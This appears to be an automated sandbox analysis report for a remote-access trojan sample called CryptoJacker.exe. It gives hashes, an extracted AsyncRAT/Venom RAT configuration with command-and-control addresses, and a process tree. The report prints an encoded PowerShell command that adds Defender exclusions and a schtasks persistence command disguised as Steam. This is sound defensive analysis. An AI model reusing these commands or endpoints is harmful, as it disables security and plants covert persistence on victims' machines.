Analysis
-
max time kernel
150s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
01-07-2024 13:07
Static task
static1
Behavioral task
behavioral1
Sample
CryptoJacker.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
CryptoJacker.exe
Resource
win10v2004-20240508-en
General
-
Target
CryptoJacker.exe
-
Size
10.6MB
-
MD5
d8a30735aa4702e200ed432d223c3ad8
-
SHA1
fa144148c226a9d08e1d1179cfa60597d4f08cac
-
SHA256
24aeb855ead570407cef3835b4e5ac516e9ec8dd1d0105662727e4f12082b3d2
-
SHA512
cbc030dd159172c2448554393caeb8b0c910d302dec1edc3a719c47be01bb90a4c243d1d15f0cbfebaf0e016cebec7e5c173c4d5cdd27ffdb557716f2071014a
-
SSDEEP
196608:g0Kn9PL3A8tKCn4bwcfAjSNgeQ4ZhseG0j73cQIqW3yiFoNWpPm4Q:/KnZQ4n4Z5Ve0PJIf3rFXdm4Q
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
10.0.2.15:9090
10.0.2.15:52033
147.185.221.19:9090
147.185.221.19:52033
yigdzohbebyxyvvzbc
-
delay
1
-
install
true
-
install_file
Steam.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Main.exe family_asyncrat -
Executes dropped EXE 4 IoCs
Processes:
crypto_jacker.exeMain.execrypto_jacker.exeSteam.exepid process 2968 crypto_jacker.exe 2600 Main.exe 2644 crypto_jacker.exe 1956 Steam.exe -
Loads dropped DLL 5 IoCs
Processes:
CryptoJacker.execrypto_jacker.execrypto_jacker.exepid process 1932 CryptoJacker.exe 2564 1932 CryptoJacker.exe 2968 crypto_jacker.exe 2644 crypto_jacker.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\crypto_jacker.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1032 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeMain.exeSteam.exepid process 2184 powershell.exe 2600 Main.exe 2600 Main.exe 2600 Main.exe 2600 Main.exe 2600 Main.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe 1956 Steam.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeMain.exeSteam.exedescription pid process Token: SeDebugPrivilege 2184 powershell.exe Token: SeDebugPrivilege 2600 Main.exe Token: SeDebugPrivilege 1956 Steam.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Steam.exepid process 1956 Steam.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
CryptoJacker.execrypto_jacker.exeMain.execmd.execmd.exedescription pid process target process PID 1932 wrote to memory of 2184 1932 CryptoJacker.exe powershell.exe PID 1932 wrote to memory of 2184 1932 CryptoJacker.exe powershell.exe PID 1932 wrote to memory of 2184 1932 CryptoJacker.exe powershell.exe PID 1932 wrote to memory of 2184 1932 CryptoJacker.exe powershell.exe PID 1932 wrote to memory of 2968 1932 CryptoJacker.exe crypto_jacker.exe PID 1932 wrote to memory of 2968 1932 CryptoJacker.exe crypto_jacker.exe PID 1932 wrote to memory of 2968 1932 CryptoJacker.exe crypto_jacker.exe PID 1932 wrote to memory of 2968 1932 CryptoJacker.exe crypto_jacker.exe PID 1932 wrote to memory of 2600 1932 CryptoJacker.exe Main.exe PID 1932 wrote to memory of 2600 1932 CryptoJacker.exe Main.exe PID 1932 wrote to memory of 2600 1932 CryptoJacker.exe Main.exe PID 1932 wrote to memory of 2600 1932 CryptoJacker.exe Main.exe PID 2968 wrote to memory of 2644 2968 crypto_jacker.exe crypto_jacker.exe PID 2968 wrote to memory of 2644 2968 crypto_jacker.exe crypto_jacker.exe PID 2968 wrote to memory of 2644 2968 crypto_jacker.exe crypto_jacker.exe PID 2600 wrote to memory of 2572 2600 Main.exe cmd.exe PID 2600 wrote to memory of 2572 2600 Main.exe cmd.exe PID 2600 wrote to memory of 2572 2600 Main.exe cmd.exe PID 2600 wrote to memory of 1988 2600 Main.exe cmd.exe PID 2600 wrote to memory of 1988 2600 Main.exe cmd.exe PID 2600 wrote to memory of 1988 2600 Main.exe cmd.exe PID 1988 wrote to memory of 1032 1988 cmd.exe timeout.exe PID 1988 wrote to memory of 1032 1988 cmd.exe timeout.exe PID 1988 wrote to memory of 1032 1988 cmd.exe timeout.exe PID 2572 wrote to memory of 1976 2572 cmd.exe schtasks.exe PID 2572 wrote to memory of 1976 2572 cmd.exe schtasks.exe PID 2572 wrote to memory of 1976 2572 cmd.exe schtasks.exe PID 1988 wrote to memory of 1956 1988 cmd.exe Steam.exe PID 1988 wrote to memory of 1956 1988 cmd.exe Steam.exe PID 1988 wrote to memory of 1956 1988 cmd.exe Steam.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe"C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAcgB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAbQB6ACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Main.exe"C:\Users\Admin\AppData\Local\Temp\Main.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2617.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\Steam.exe"C:\Users\Admin\AppData\Roaming\Steam.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\_MEI29682\python311.dllFilesize
5.5MB
MD5e2bd5ae53427f193b42d64b8e9bf1943
SHA17c317aad8e2b24c08d3b8b3fba16dd537411727f
SHA256c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400
SHA512ae23a6707e539c619fd5c5b4fc6e4734edc91f89ebe024d25ff2a70168da6105ac0bd47cf6bf3715af6411963caf0acbb4632464e1619ca6361abf53adfe7036
-
C:\Users\Admin\AppData\Local\Temp\tmp2617.tmp.batFilesize
149B
MD51a5c4a8386b3596e72460dc52b408da9
SHA1c385dcc0c2d0ff777d8361a6cfad24942645dbbb
SHA25615fcaee33b841888872824ad5e0e45381f7d0231d17247f3293aaf8f56ec8f6e
SHA512781b6ffe15cd44d69c466b815e933331edc31eded149d647eaabeac4a2c33ec8be30009793d45306c9ae04be9dc11afa046a1e825514aa2d03d40f801a533b45
-
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.confFilesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
\Users\Admin\AppData\Local\Temp\Main.exeFilesize
74KB
MD5b8ccfc163e2d56a73b6fd7387a45e6eb
SHA1f81a368c275574fa808a92d29c5e0b37e01162ce
SHA2568386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84
SHA5128ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf
-
\Users\Admin\AppData\Local\Temp\crypto_jacker.exeFilesize
10.5MB
MD5ccb8c058314c049211a16c6291182261
SHA1f47c9a4cb2b48e5ede2d4a4bd934c2cd98cd9b90
SHA25630da0a0cf38714ea7b3c3f1b6c30f810912e7cae78a053511ba1b3e03c9b6499
SHA512c878cf36309e91450791a6e4e0c3163b1226bbfcb6fdcdb3d421f228ed5c65771d3982f7f6ca24d5946f41aed5447de446f80fd92abeee6231d79f4860c76c71
-
memory/1956-88-0x0000000001190000-0x00000000011A8000-memory.dmpFilesize
96KB
-
memory/2600-36-0x0000000001210000-0x0000000001228000-memory.dmpFilesize
96KB